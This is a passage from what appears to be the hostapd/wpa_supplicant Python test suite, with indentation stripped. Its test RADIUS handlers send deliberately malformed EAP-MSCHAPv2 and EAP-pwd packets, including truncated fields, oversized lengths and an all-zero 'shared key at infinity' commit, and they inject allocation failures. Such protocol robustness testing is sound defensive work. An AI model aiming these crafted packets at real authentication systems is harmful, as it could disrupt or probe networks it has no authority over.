return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge")
payload = 'C=00112233445566778899aabbccddeefQ '
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short challenge packet")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 16)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - invalid ms_len and workaround disabled")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6 + 1, 16) + 16*'A' + 'foobar'
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 16):
logger.info("RUN: %d" % i)
if i == 12:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
elif i == 14:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
phase2="mschapv2_retry=0",
password="password", wait_connect=False)
elif i == 15:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
eap_workaround="0",
password="password", wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 8, 11, 12 ]:
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
if i in [ 11, 12 ]:
ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
timeout=10)
if ev is None:
raise Exception("Timeout on password change")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP success")
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 13 ]:
ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
timeout=10)
if ev is None:
raise Exception("Timeout on identity request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
# TODO: Does this work correctly?
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 4, 5, 6, 7, 14 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
"""EAP-MSCHAPv2 protocol tests (error paths)"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_fail_password_expired(ctx):
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
def mschapv2_success_after_password_change(ctx, req=None):
logger.info("Test: Success after password change")
if req is None or len(req) != 591:
payload = "S=1122334455667788990011223344556677889900"
else:
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
tests = [ "os_get_random;eap_mschapv2_change_password",
"generate_nt_response;eap_mschapv2_change_password",
"get_master_key;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"old_nt_password_hash_encrypted_with_new_nt_password_hash" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "encrypt_pw_block_with_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_success" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "eap_msg_alloc;eap_mschapv2_change_password" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_pwd(dev, apdev):
"""EAP-pwd protocol tests"""
check_eap_capa(dev[0], "PWD")
global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
eap_proto_pwd_test_done = False
eap_proto_pwd_test_wait = False
def pwd_handler(ctx, req):
logger.info("pwd_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_pwd_test_wait
eap_proto_pwd_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_PWD)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Total-Length field")
payload = struct.pack("B", 0x80)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large Total-Length")
payload = struct.pack(">BH", 0x80, 65535)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BH", 0xc0, 10)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Total-Length value in the second fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment with extra data")
payload = struct.pack(">BHB", 0x80, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BHB", 0xc0, 2, 1)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Extra data in the second fragment")
payload = struct.pack(">BBB", 0x0, 2, 3)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short id exchange")
payload = struct.pack(">B", 0x01)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported rand func in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported prf in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported password pre-processing technique in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected commit exchange")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Commit payload length")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
payload = struct.pack(">B", 0x02) + 96*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm payload length 0")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm payload with incorrect value")
payload = struct.pack(">B", 0x03) + 32*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected confirm exchange")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
logger.info("No more test responses available - test case completed")
global eap_proto_pwd_test_done
eap_proto_pwd_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pwd_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
i = 0
while not eap_proto_pwd_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ok = False
for j in range(5):
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
"CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
ok = True
break
if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
ok = True
break
if not ok:
raise Exception("Expected EAP event not seen")
if eap_proto_pwd_test_wait:
for k in range(10):
time.sleep(0.1)
if not eap_proto_pwd_test_wait:
break
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_pwd_errors(dev, apdev):
"""EAP-pwd local error cases"""
check_eap_capa(dev[0], "PWD")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
fragment_size="0",
password="secret password")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
funcs = [ "eap_pwd_getkey", "eap_pwd_get_emsk" ]
for func in funcs:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password", erp="1",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 7):
with alloc_fail(dev[0], i, "eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wpabuf_alloc;eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 12):
with alloc_fail(dev[0], i, "eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
